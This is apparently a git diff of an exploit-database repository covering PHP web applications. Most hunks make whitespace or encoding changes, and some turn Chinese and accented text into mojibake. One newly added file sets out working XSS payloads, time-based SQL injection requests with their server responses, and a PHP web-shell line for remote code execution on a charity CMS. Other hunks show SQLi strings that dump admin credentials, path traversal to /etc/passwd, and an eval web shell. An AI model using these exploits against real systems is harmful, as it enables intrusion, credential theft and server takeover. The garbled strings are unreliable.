-                <option value="CFMShortcode">CFMShortcode</option>
-        </select>
-    </label>
-    <button type="submit" value="Submit">Submit</button>
+                <option value="CFMShortcode">CFMShortcode</option>
+        </select>
+    </label>
+    <button type="submit" value="Submit">Submit</button>
 </form>
 ```
\ No newline at end of file
diff --git a/exploits/php/webapps/46864.txt b/exploits/php/webapps/46864.txt
index aff14fb5d..590df9840 100644
--- a/exploits/php/webapps/46864.txt
+++ b/exploits/php/webapps/46864.txt
@@ -1,4 +1,4 @@
-# Exploit Title: Interspire Email Marketer 6.20 - Remote Code Execution
+# Exploit Title: Interspire Email Marketer 6.20 - Remote Code Execution
 # Date: May 2019
 # Exploit Author: Numan Türle
 # Vendor Homepage: https://www.interspire.com
@@ -52,8 +52,8 @@ if (isset($_FILES['widget']['name'])) {
              }
          }
 
-input file name : widget[0][field][][value]
-submit : surveys_submit.php?formId=1337
+input file name : widget[0][field][][value]
+submit : surveys_submit.php?formId=1337
 
 
 POST /iem/surveys_submit.php?formId=1337 HTTP/1.1
diff --git a/exploits/php/webapps/48238.txt b/exploits/php/webapps/48238.txt
index d42cf6122..6df085c3a 100644
--- a/exploits/php/webapps/48238.txt
+++ b/exploits/php/webapps/48238.txt
@@ -10,17 +10,17 @@
 * CVE : N/A
 
 Vulnerable Source:
-    88: move_uploaded_file move_uploaded_file($tmp_name, $dest))
-    86: foreach($files['tmp_name'] as $key=>$tmp_name)
-    80: $files = $_FILES['file']){
-    72: $_FILES['file'] = $_FILES[$plugin];  // if(isset($_FILES)), 
-    87: $dest = $tmpDir . '/' . $files['name'][$key]; 
-    81: $tmpDir = APP_PATH . '/.tmp'; 
-    24: define('APP_PATH', strtr(__DIR__, '\\', '/'));  // define() 
-    80: $files = $_FILES['file']){
-    72: $_FILES['file'] = $_FILES[$plugin];  // if(isset($_FILES)), 
-    80: if(isset($_FILES['file']) && $files = $_FILES['file'])
-    84: if(is_array($files['tmp_name']))
+    88: move_uploaded_file move_uploaded_file($tmp_name, $dest))
+    86: foreach($files['tmp_name'] as $key=>$tmp_name)
+    80: $files = $_FILES['file']){
+    72: $_FILES['file'] = $_FILES[$plugin];  // if(isset($_FILES)), 
+    87: $dest = $tmpDir . '/' . $files['name'][$key]; 
+    81: $tmpDir = APP_PATH . '/.tmp'; 
+    24: define('APP_PATH', strtr(__DIR__, '\\', '/'));  // define() 
+    80: $files = $_FILES['file']){
+    72: $_FILES['file'] = $_FILES[$plugin];  // if(isset($_FILES)), 
+    80: if(isset($_FILES['file']) && $files = $_FILES['file'])
+    84: if(is_array($files['tmp_name']))
 
 Exploit:
 <?php
diff --git a/exploits/php/webapps/48785.txt b/exploits/php/webapps/48785.txt
index 16816c753..4142669d7 100644
--- a/exploits/php/webapps/48785.txt
+++ b/exploits/php/webapps/48785.txt
@@ -5,7 +5,7 @@
 # Software Link: https://savsoftquiz.com/web/demo.php
 # Version: 5.0
 # Tested on: Windows 10/Kali Linux
-# Contact: https://www.linkedin.com/in/hemantsolo/
+# Contact: https://www.linkedin.com/in/hemantsolo/
 
 Stored Cross-site scripting(XSS):
 Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.
diff --git a/exploits/php/webapps/4880.php b/exploits/php/webapps/4880.php
index 3720e043c..58b112c75 100644
--- a/exploits/php/webapps/4880.php
+++ b/exploits/php/webapps/4880.php
@@ -2,7 +2,7 @@
 /*
  *    DomPHP <= 0.81 Remote Add Administrator Exploit
  *    c0ded by j0j0
- *    dork: "Site créé à l'aide du CMS DomPHP"
+ *    dork: "Site créé à l'aide du CMS DomPHP"
  *
  *    Exploit work with CURL
 */
diff --git a/exploits/php/webapps/48974.txt b/exploits/php/webapps/48974.txt
index 6cf2eb5d2..3848d3359 100644
--- a/exploits/php/webapps/48974.txt
+++ b/exploits/php/webapps/48974.txt
@@ -1,4 +1,4 @@
-# Exploit Title:  DedeCMS v.5.8 - "keyword" Cross-Site Scripting
+# Exploit Title:  DedeCMS v.5.8 - "keyword" Cross-Site Scripting
 # Date: 2020-07-27
 # Exploit Author: Noth
 # Vendor Homepage: https://github.com/dedetech/DedeCMSv5
diff --git a/exploits/php/webapps/48979.py b/exploits/php/webapps/48979.py
index 4441f5a53..e03421704 100755
--- a/exploits/php/webapps/48979.py
+++ b/exploits/php/webapps/48979.py
@@ -2,11 +2,11 @@
 # -*- coding: utf-8 -*-
 # Exploit Title: Wordpress Plugin Simple File List 4.2.2 - Arbitrary File Upload
 # Date: 2020-11-01
-# Exploit Author: H4rk3nz0 based off exploit by coiffeur
-# Original Exploit: https://www.exploit-db.com/exploits/48349
+# Exploit Author: H4rk3nz0 based off exploit by coiffeur
+# Original Exploit: https://www.exploit-db.com/exploits/48349
 # Vendor Homepage: https://simplefilelist.com/
-# Software Link: https://wordpress.org/plugins/simple-file-list/ 
-# Version: Wordpress v5.4 Simple File List v4.2.2 
+# Software Link: https://wordpress.org/plugins/simple-file-list/ 
+# Version: Wordpress v5.4 Simple File List v4.2.2 
 
 import requests
 import random
diff --git a/exploits/php/webapps/49276.txt b/exploits/php/webapps/49276.txt
index e1a407869..5db95ca3b 100644
--- a/exploits/php/webapps/49276.txt
+++ b/exploits/php/webapps/49276.txt
@@ -21,15 +21,15 @@ Step 5. This will inject successfully and you will have an information disclosur
 
 ---
 Parameter: id (GET)
-    Type: boolean-based blind
-    Title: AND boolean-based blind - WHERE or HAVING clause
-    Payload: page=edit_staff&id=1 AND 4164=4164
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: page=edit_staff&id=1 AND 4164=4164
 
-    Type: time-based blind
-    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
-    Payload: page=edit_staff&id=1 AND (SELECT 9430 FROM (SELECT(SLEEP(5)))HIyV)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: page=edit_staff&id=1 AND (SELECT 9430 FROM (SELECT(SLEEP(5)))HIyV)
 
-    Type: UNION query
-    Title: Generic UNION query (NULL) - 10 columns
-    Payload: page=edit_staff&id=-8018 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a716a71,0x497a58666d50656449704b4d76784f43577748416175666f44685869774177416f454c546458536d,0x717a7a6a71),NULL,NULL,NULL,NULL,NULL-- -
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 10 columns
+    Payload: page=edit_staff&id=-8018 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a716a71,0x497a58666d50656449704b4d76784f43577748416175666f44685869774177416f454c546458536d,0x717a7a6a71),NULL,NULL,NULL,NULL,NULL-- -
 ---
\ No newline at end of file
diff --git a/exploits/php/webapps/49277.txt b/exploits/php/webapps/49277.txt
index eeb81aa67..cdbec72a0 100644
--- a/exploits/php/webapps/49277.txt
+++ b/exploits/php/webapps/49277.txt
@@ -27,19 +27,19 @@ Step 7. This will inject successfully and you will have an information disclosur
 
 Parameter: id (GET)
 
-    Type: boolean-based blind
+    Type: boolean-based blind
 
-    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
 
-    Payload: id=2' RLIKE (SELECT (CASE WHEN (4085=4085) THEN 2 ELSE 0x28 END))-- rKrg
+    Payload: id=2' RLIKE (SELECT (CASE WHEN (4085=4085) THEN 2 ELSE 0x28 END))-- rKrg
 
 
 
-    Type: error-based
+    Type: error-based
 
-    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
 
-   
+   
  Payload: id=2' AND (SELECT 7113 FROM(SELECT 
 COUNT(*),CONCAT(0x716a626a71,(SELECT 
 (ELT(7113=7113,1))),0x71766b6a71,FLOOR(RAND(0)*2))x FROM 
@@ -47,27 +47,27 @@ INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- tGzP
 
 
 
-    Type: stacked queries
+    Type: stacked queries
 
-    Title: MySQL >= 5.0.12 stacked queries (comment)
+    Title: MySQL >= 5.0.12 stacked queries (comment)
 
-    Payload: id=2';SELECT SLEEP(5)#
+    Payload: id=2';SELECT SLEEP(5)#
 
 
 
-    Type: time-based blind
+    Type: time-based blind
 
-    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
 
-    Payload: id=2' AND (SELECT 8504 FROM (SELECT(SLEEP(5)))sMoK)-- IXQq
+    Payload: id=2' AND (SELECT 8504 FROM (SELECT(SLEEP(5)))sMoK)-- IXQq
 
 
 
-    Type: UNION query
+    Type: UNION query
 
-    Title: MySQL UNION query (NULL) - 4 columns
+    Title: MySQL UNION query (NULL) - 4 columns
 
-   
+   
  Payload: id=-1072' UNION ALL SELECT 
 NULL,CONCAT(0x716a626a71,0x664b4d6f72794f69657a6c5a4e415a434b70547951435077694b66505a7572574d73704b54524b72,0x71766b6a71),NULL,NULL#
 
diff --git a/exploits/php/webapps/49551.txt b/exploits/php/webapps/49551.txt
index 0efc0fa81..e6f74a330 100644
--- a/exploits/php/webapps/49551.txt
+++ b/exploits/php/webapps/49551.txt
@@ -10,9 +10,9 @@
 
 --------------------------Proof of Concept-----------------------
 
-1. Login with an account having high privileges  
+1. Login with an account having high privileges  
 2. Navigate to System -> Plugins and select any plugin
-3. Change the plugin name and enter the following payload  "><svg/onload=alert(123)> in the name parameter
+3. Change the plugin name and enter the following payload  "><svg/onload=alert(123)> in the name parameter
 4. Payload gets stored in the database
 5. The payload gets executed after the victim checks the plugin page.
 6. This vulnerability needs high privilege and can affect other users with similar privileges
\ No newline at end of file
diff --git a/exploits/php/webapps/49555.txt b/exploits/php/webapps/49555.txt
index d69ff844f..1691dfcdc 100644
--- a/exploits/php/webapps/49555.txt
+++ b/exploits/php/webapps/49555.txt
@@ -1,4 +1,4 @@
-# Exploit Title: b2evolution 6.11.6 - 'tab3' Reflected XSS
+# Exploit Title: b2evolution 6.11.6 - 'tab3' Reflected XSS
 # CVE: CVE-2020-22839
 # Date: 10/02/2021
 # Exploit Author: Nakul Ratti, Soham Bakore
@@ -12,5 +12,5 @@
 Steps to Reproduce:
 
 1. Send the following URL http://HOST/evoadm.php?.ctrl=comments&filter=restore&tab3=123%22onmouseover=%22alert(document.domain)%22&blog=1&blog=1 to the logged in victim using any social engineering technique.
-2. When an unsuspecting user with high privileges opens this URL, XSS will be triggered  which will execute the malicious javascript payload in users browser.
+2. When an unsuspecting user with high privileges opens this URL, XSS will be triggered  which will execute the malicious javascript payload in users browser.
 3. The vulnerable parameter in this case is “tab3”.
\ No newline at end of file
diff --git a/exploits/php/webapps/49640.py b/exploits/php/webapps/49640.py
index 94bb08c71..a5033341d 100755
--- a/exploits/php/webapps/49640.py
+++ b/exploits/php/webapps/49640.py
@@ -34,7 +34,7 @@ def main():
     def phpshell():
         return """
         <?php
-// Copyright (c) 2020 Ivan Å incek
+// Copyright (c) 2020 Ivan Å incek
 // v1.1
 // Requires PHP v5.0.0 or greater.
 // Works on Linux OS, macOS and Windows OS.
diff --git a/exploits/php/webapps/49644.txt b/exploits/php/webapps/49644.txt
index cb9fd131a..57a68060b 100644
--- a/exploits/php/webapps/49644.txt
+++ b/exploits/php/webapps/49644.txt
@@ -4,7 +4,7 @@
 # Vendor Homepage: https://www.rconfig.com
 # Software Link: https://www.rconfig.com/downloads/rconfig-3.9.6.zip
 # Version: rConfig v3.9.6
-# Install scripts  :
+# Install scripts  :
 # https://www.rconfig.com/downloads/scripts/install_rConfig.sh
 # https://www.rconfig.com/downloads/scripts/centos7_install.sh
 # https://www.rconfig.com/downloads/scripts/centos6_install.sh
@@ -15,10 +15,10 @@
 # http://help.rconfig.com/gettingstarted/postinstall
 
 # Description:
-rConfig, the open source network device configuration management tool, is vulnerable to local file inclusion in /lib/ajaxHandlers/ajaxGetFileByPath.php with parameter path.  ajaxGetFileByPath.php allows authenticated users to download any file on the server.
+rConfig, the open source network device configuration management tool, is vulnerable to local file inclusion in /lib/ajaxHandlers/ajaxGetFileByPath.php with parameter path.  ajaxGetFileByPath.php allows authenticated users to download any file on the server.
 
 The following steps can be carried out in duplicating this vulnerability.
 
 - Login the rConfig application with your credentials.
-- Enter the following link to your browser: 
+- Enter the following link to your browser: 
 http(s)://<SERVER>/lib/ajaxHandlers/ajaxGetFileByPath.php?path=../../../../../../etc/passwd
\ No newline at end of file
diff --git a/exploits/php/webapps/49665.txt b/exploits/php/webapps/49665.txt
index 6763641bf..98ce96bee 100644
--- a/exploits/php/webapps/49665.txt
+++ b/exploits/php/webapps/49665.txt
@@ -1,10 +1,10 @@
-# Exploit Title: rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (1)
+# Exploit Title: rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (1)
 # Date: 2021-03-17
 # Exploit Author: Murat ŞEKER
 # Vendor Homepage: https://www.rconfig.com
 # Software Link: https://www.rconfig.com/downloads/rconfig-3.9.6.zip
 # Version: rConfig v3.9.6
-# Install scripts  :
+# Install scripts  :
 # https://www.rconfig.com/downloads/scripts/install_rConfig.sh
 # https://www.rconfig.com/downloads/scripts/centos7_install.sh
 # https://www.rconfig.com/downloads/scripts/centos6_install.sh
@@ -20,7 +20,7 @@ rConfig, the open source network device configuration management tool, is vulner
 The following steps can be carried out in duplicating this vulnerability.
 
 - Login the rConfig application with your credentials.
-- Repeat 
+- Repeat 
 
 POST /lib/crud/vendors.crud.php HTTP/1.1
 Host: localhost
diff --git a/exploits/php/webapps/49854.txt b/exploits/php/webapps/49854.txt
index d9ca4893b..ac3cb3c82 100644
--- a/exploits/php/webapps/49854.txt
+++ b/exploits/php/webapps/49854.txt
@@ -1,4 +1,4 @@
-# Exploit Title: Human Resource Information System  0.1  - 'First Name'  Persistent Cross-Site Scripting (Authenticated)
+# Exploit Title: Human Resource Information System  0.1  - 'First Name'  Persistent Cross-Site Scripting (Authenticated)
 # Date: 04-05-2021
 # Exploit Author: Reza Afsahi
 # Vendor Homepage: https://www.sourcecodester.com
@@ -9,12 +9,12 @@
 
 # --- Description --- #
 
-# The web application allows for an  assisstant to inject persistent Cross-Site-Scripting payload which will be executed in both assistant and Super Admin panel  
+# The web application allows for an  assisstant to inject persistent Cross-Site-Scripting payload which will be executed in both assistant and Super Admin panel  
 
 
 # --- Proof of concept --- #
 
-1- Login as Assistant and go to:  http://localhost/code/Admin_Dashboard/Add_employee.php
+1- Login as Assistant and go to:  http://localhost/code/Admin_Dashboard/Add_employee.php
 2- Click on Add Employee button
 3- Inject this payload into First Name input : <script>alert('xss')</script> 
 4- and fill other inputs as you want (Other inputs might be vulnerable as well) then click on Save button.
diff --git a/exploits/php/webapps/49870.txt b/exploits/php/webapps/49870.txt
index 1c174253d..9fb64c862 100644
--- a/exploits/php/webapps/49870.txt
+++ b/exploits/php/webapps/49870.txt
@@ -8,11 +8,11 @@
 
 # --- Description --- #
 
-# The web application allows member to inject persistent Cross-Site-Scripting payload which will be executed in both member and Admin panel  
+# The web application allows member to inject persistent Cross-Site-Scripting payload which will be executed in both member and Admin panel  
 
 # --- Proof of concept --- #
 
-1- Create account and login as member and go to:  http://localhost/APR/edit_info.php
+1- Create account and login as member and go to:  http://localhost/APR/edit_info.php
 2- Inject this payload into Firstname input : <script>alert(document.cookie)</script>
 4- and fill other inputs as you want (Other inputs might be vulnerable as well) then click on Update button.
 5- refresh the page and Xss popup will be triggered.
diff --git a/exploits/php/webapps/50217.txt b/exploits/php/webapps/50217.txt
new file mode 100644
index 000000000..692721255
--- /dev/null
+++ b/exploits/php/webapps/50217.txt
@@ -0,0 +1,135 @@
+# Exploit Title: Charity Management System CMS 1.0 - Multiple Vulnerabilities
+# Date: 18/08/2021
+# Exploit Author: Davide 't0rt3ll1n0' Taraschi
+# Vendor Homepage: https://www.sourcecodester.com/users/tips23
+# Software Link: https://www.sourcecodester.com/php/14908/simple-charity-website-management-system-cms-php-free-source-code.htmlpolice-crime-record-management-system.html
+# Version: 1.0
+# Testeted on: Linux (Ubuntu 20.04) using LAMPP
+
+
+## Unauthenticated reflected XSS
+# Vulnerable code in '/search.php' at line 44/45:
+<?php if($count_all <= 0): ?>
+    <h4 class="text-center">No Article with "<?php echo $_GET['search'] ?>" keyword found.</h4> 
+The content of the 'search' variable is printed on the page without being checked, leading to XSS
+# PoC
+Go to 'http://site.com/charity/' and in the search box input "<svg onload=alert(document.domain)>" without the double quotes, and a text box should appear
+
+
+## Authenticated stored XSS
+There is a stored XSS in '/charity/admin/maintenance/manage_topic.php' due to a failure to sanitize user input
+# Poc
+1) Login as admin
+2) Go to '/maintenance/manage_topic.php'
+3) In "description" insert "<svg onload=alert(document.domain)>" without the double quotes
+4) Click the "save" below
+5) An alert box should appear
+
+
+## POST Authenticated SQL Injection
+# Vulnerable code in '/charity/classes/Master.php' at line 67
+$del = $this->conn->query("DELETE FROM `topics` where id = '{$id}'");
+The $id variable is used without being checked, leading to SQLi
+# PoC
+Request:
+POST /charity/classes/Master.php?f=delete_topic HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 4
+Origin: http://localhost
+DNT: 1
+Connection: close
+Referer: http://localhost/charity/admin/?page=maintenance/topics
+Cookie: PHPSESSID=de17186191c1cbdeb6e815ea8c21103f
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- foo
+
+Response after 5 seconds (the sleep has been executed)
+
+HTTP/1.1 200 OK
+Date: Wed, 18 Aug 2021 14:32:13 GMT
+Server: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/7.4.22 mod_perl/2.0.11 Perl/v5.32.1
+X-Powered-By: PHP/7.4.22
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Access-Control-Allow-Origin: *
+Content-Length: 20
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+{"status":"success"}
+
+
+## GET Authenticated SQL Injection
+# Vulnerable code in '/charity/admin/maintenance/manage_topic.php' at line 2/3
+if(isset($_GET['id']) && $_GET['id'] > 0){
+    $qry = $conn->query("SELECT * from `topics` where id = '{$_GET['id']}' ");
+    ...
+}
+As usual the 'id' variable is passed to the prepared statement without being checked, leading to (another) SQLi
+# PoC
+Similar to the previous one (same payload)
+
+
+## POST Unauthenticated SQL Injection
+# Vulnerable code in '/charity/classes/Login.php' at line 21
+$qry = $this->conn->query("SELECT * from users where username = '$username' and password = md5('$password') ");
+The 'username' variable is passed without being sanificated, causing a SQLi
+# PoC
+Request:
+POST /charity/classes/Login.php?f=login HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+Accept: */*
+Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 84
+Origin: http://localhost
+DNT: 1
+Connection: close
+Referer: http://localhost/charity/admin/login.php
+Cookie: PHPSESSID=de17186191c1cbdeb6e815ea8c21103f
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+username=username' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- foo&password=password
+
+Response after 5 seconds (the sleep has been executed)
+
+HTTP/1.1 200 OK
+Date: Wed, 18 Aug 2021 14:48:18 GMT
+Server: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/7.4.22 mod_perl/2.0.11 Perl/v5.32.1
+X-Powered-By: PHP/7.4.22
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Access-Control-Allow-Origin: *
+Content-Length: 164
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+{"status":"incorrect","last_qry":"SELECT * from users where username = 'username' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- foo' and password = md5('password') "}
+
+
+## PHP Code Injection lead to Authenticated Remote Code Execution (RCE)
+# Vulnerable code in /charity/classes/SystemSettings.php at line 37
+$qry = $this->conn->query("UPDATE system_info set meta_value = '{$value}' where meta_field = '{$key}' ");
+The 'value' variable will be included in the homepage of the site without being checked, leading to RCE.
+# PoC
+1) Go to /charity/admin/system_info.php and in the "Welcome content" click on "Code View" at the top right.
+2) At the bottom of the html code enter the following code: <?php if(isset($_GET['cmd'])) {system($_GET['cmd']);} ?>
+3) Click the "update" button
+4) Go to the home page and at the end of the url tipe "?cmd=$cmd" without the double quotes and replacing $cmd with the command you want to execute
+5) The output should appear in the homepage
\ No newline at end of file
diff --git a/exploits/php/webapps/5281.php b/exploits/php/webapps/5281.php
index 1767bfa3c..886f90169 100644
--- a/exploits/php/webapps/5281.php
+++ b/exploits/php/webapps/5281.php
@@ -163,7 +163,7 @@ function blind($field,$i=0)
 	global $xpl,$url;
 	$d=0; $v='';
 	
-	$charset = "etaonisrhldcumfpwgbyvkxjqz0123456789_-\$.^()[]{}Å *\"'@=/\|#?+&!`<>:;,\\";
+	$charset = "etaonisrhldcumfpwgbyvkxjqz0123456789_-\$.^()[]{}Å *\"'@=/\|#?+&!`<>:;,\\";
 	if(eregi('p',$field)) $charset = "0123456789abcdef";
 
 	while(TRUE)
diff --git a/exploits/php/webapps/6325.php b/exploits/php/webapps/6325.php
index c399e3d04..71556005c 100644
--- a/exploits/php/webapps/6325.php
+++ b/exploits/php/webapps/6325.php
@@ -816,7 +816,7 @@ class ipb_spl
 	function init_global()
 	{
 		# Charsets
-		$this->chr_spe = str_split(' :/;*(-.!,?§*µù%$£^¨=+})°]àç^_\\`è|[\'{#é~&²"@');
+		$this->chr_spe = str_split(' :/;*(-.!,?§*µù%$£^¨=+})°]à ç^_\\`è|[\'{#é~&²"@');
 		$this->chr_num = range(0, 9);
 		$this->chr_md5 = array_merge( $this->chr_num, range('a', 'f') );
 		$this->chr_ip  = array_merge( $this->chr_num, array('.') );
diff --git a/exploits/php/webapps/6968.txt b/exploits/php/webapps/6968.txt
index 2933432d8..35030a45b 100644
--- a/exploits/php/webapps/6968.txt
+++ b/exploits/php/webapps/6968.txt
@@ -14,6 +14,6 @@ Live Demo:
 
 http://www.accscripts.com/autos/demo/admin/
 
-Greetz: 8\10\2008..Il Sogni Diventa Realtà...Bimb4 Ti AmO.
+Greetz: 8\10\2008..Il Sogni Diventa Realtà ...Bimb4 Ti AmO.
 
 # milw0rm.com [2008-11-03]
\ No newline at end of file
diff --git a/exploits/php/webapps/7119.php b/exploits/php/webapps/7119.php
index 794ba710b..d3c0cf945 100644
--- a/exploits/php/webapps/7119.php
+++ b/exploits/php/webapps/7119.php
@@ -33,7 +33,7 @@ send();
 $shell = 'http://'.$host.$path.'forumdata/cache/eval.php';
 
 if (file_get_contents($shell) == '80vul')
-    exit("好了,去看看你的WebShell吧:\t$shell\n里面的代码是:\t<?eval(\$_POST[c])?>\n别告诉我你不会用 -,-\n");
+    exit("好了,åŽ»çœ‹çœ‹ä½ çš„WebShell吧:\t$shell\né‡Œé¢çš„ä»£ç æ˜¯:\t<?eval(\$_POST[c])?>\nåˆ«å‘Šè¯‰æˆ‘ä½ ä¸ä¼šç”¨ -,-\n");
 else
     exit("嗯,大概是该网站不存在漏洞,换一个吧 -,-\n");
 
diff --git a/exploits/php/webapps/7176.txt b/exploits/php/webapps/7176.txt
index 1f96efbfa..505a9b976 100644
--- a/exploits/php/webapps/7176.txt
+++ b/exploits/php/webapps/7176.txt
@@ -8,7 +8,7 @@
  
 #########
  
-[■] £XpLoIT:
+[■] £XpLoIT:
  
 |: http://www.demosite.com/tourview.php?tourid=2%20and%201=1--   (true)
  
@@ -21,7 +21,7 @@ Version:
 V=> 5.x.x XD
  
 #########
-[â– ] D&M0:
+[â– ] D&M0:
  
 |: http://www.toursmanager.com/demo/tourview.php?tourid=2%20and%201=1--
  
@@ -31,7 +31,7 @@ V=> 5.x.x XD
  
 #########
  
-[â– ] Th4Nks T0:
+[â– ] Th4Nks T0:
  
 \> Boom3rang </ (very kind) ;-)
 \> Langy  </
diff --git a/exploits/php/webapps/7185.php b/exploits/php/webapps/7185.php
index f402ef118..3ded85090 100644
--- a/exploits/php/webapps/7185.php
+++ b/exploits/php/webapps/7185.php
@@ -101,7 +101,7 @@ $resp = '';
 while ($fp && !feof($fp))
 $resp .= fread($fp, 1024);
 
-if (strpos($resp, '您的密码已重新设置，请使用新密码登录。') !== false)
+if (strpos($resp, 'æ‚¨çš„å¯†ç å·²é‡æ–°è®¾ç½®ï¼Œè¯·ä½¿ç”¨æ–°å¯†ç ç™»å½•ã€‚') !== false)
 exit("Expoilt Success!\nUser New Password:\t123456\n");
 else
 exit("Exploit Failed!\n");
diff --git a/exploits/php/webapps/7235.txt b/exploits/php/webapps/7235.txt
index 5039f0f5a..2cb439788 100644
--- a/exploits/php/webapps/7235.txt
+++ b/exploits/php/webapps/7235.txt
@@ -1,4 +1,4 @@
-[â– ]  Jamit Job Board v.3 (index.php show_emp) <= Blind $ql Injection
+[â– ]  Jamit Job Board v.3 (index.php show_emp) <= Blind $ql Injection
 
  
 >☻<
@@ -12,12 +12,12 @@
 >☻<
  
  
-[â– ] ExPL0iT:
+[â– ] ExPL0iT:
  
 |: http://www.example.com/index.php?show_emp=[sql] 
  
  
-[■] D£M0: 
+[■] D£M0: 
  
 |: http://www.jamit.com/jobs/index.php?show_emp=1%20and%20substring(@@version,1,1)=4 [NO°°]
  
@@ -26,7 +26,7 @@
 (l00k at the end of the PaG&)
 
  
-[â– ] Th4nKs:::::>
+[â– ] Th4nKs:::::>
  
 \> Str0ke </\> Thc(MarJuana) </\> WiLLiam S. Burroughs </\> LiLiTh (You Ar& Mi!nE!) </
 
diff --git a/exploits/php/webapps/7238.txt b/exploits/php/webapps/7238.txt
index d4ec7e478..b02b311f4 100644
--- a/exploits/php/webapps/7238.txt
+++ b/exploits/php/webapps/7238.txt
@@ -1,4 +1,4 @@
-[â– ]  Post Affiliate Pro v.3 (index.php md) <= Blind $ql Injection
+[â– ]  Post Affiliate Pro v.3 (index.php md) <= Blind $ql Injection
 
  
 >©<
@@ -11,13 +11,13 @@
 >©<
  
  
-[â– ] ExPL0iT:
+[â– ] ExPL0iT:
  
 |: http://www.example.com/postaffiliatepro3/merchants/index.php?md=Affiliate_Merchants_Views_AffiliateManager&fromprofile=1&umprof_status=[sql] 
  
  [you must be merchants]
 
-[■] D£M0: 
+[■] D£M0: 
  
 |: http://www.demo.qualityunit.com/postaffiliatepro3/merchants/index.php?md=Affiliate_Merchants_Views_AffiliateManager&fromprofile=1&umprof_status=1 and substring(@@version,1,1)=5 [NO°°]
  
@@ -25,7 +25,7 @@
  
 
  
-[â– ] Th4nKs::
+[â– ] Th4nKs::
  
 \> Str0ke </
 \> Joy Division </
diff --git a/exploits/php/webapps/7250.txt b/exploits/php/webapps/7250.txt
index 2d47ac794..8912a3842 100644
--- a/exploits/php/webapps/7250.txt
+++ b/exploits/php/webapps/7250.txt
@@ -1,4 +1,4 @@
-[â– ] Prince Comparison Script : Shopping card <= Rem0tE $ql Injection
+[â– ] Prince Comparison Script : Shopping card <= Rem0tE $ql Injection
  
 >@.@<
 
@@ -11,19 +11,19 @@
  
 
  
-[â– ] ExPL0iT:
+[â– ] ExPL0iT:
  
 |: http://www.example.com/product.php?category_id=1&subcategory_id=[$qL]
  
  
  
-[■] D£M0:  
+[■] D£M0:  
  
 |: http://willscript.com/rjbike_new/product.php?category_id=1&subcategory_id=4 union select 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from admin--
  
 (you see the username and password of adm in the title of one product)
  
-[â– ] Th4nKs::
+[â– ] Th4nKs::
  
 \> str0ke </
 \> OnlY me ( no help for this ) ;-) </
diff --git a/exploits/php/webapps/7432.txt b/exploits/php/webapps/7432.txt
index 5ce438cdb..59442f85a 100644
--- a/exploits/php/webapps/7432.txt
+++ b/exploits/php/webapps/7432.txt
@@ -1,4 +1,4 @@
-[■]  Xpoze Pro  (home menù) <= Blind $ql Injection
+[■]  Xpoze Pro  (home menù) <= Blind $ql Injection
 
  
 >---------------------------------------<
@@ -11,14 +11,14 @@
 >---------------------------------------<
  
  
-[â– ] ExPL0iT:
+[â– ] ExPL0iT:
  
 Dork: " Powered by Xpoze "
 
 |: http://www.example.com/home.html?menu=[$qL] 
 
 
-[■] D£M0: 
+[■] D£M0: 
  
 |: http://demo.xpoze.org/home.html?menu=110%20and%20substring(@@version,1,1)=5  [NO°°]
  
@@ -26,7 +26,7 @@ Dork: " Powered by Xpoze "
  
 
  
-[â– ] Th4nKs::
+[â– ] Th4nKs::
  
 \> Str0ke </ \>Il pavimento</ \>sibilla</ \>Lo z00</ \>I FoxHound ( goto www.myspace.com/foxhoundindie )
 
diff --git a/exploits/php/webapps/7465.txt b/exploits/php/webapps/7465.txt
index c90501e53..1145bbeba 100644
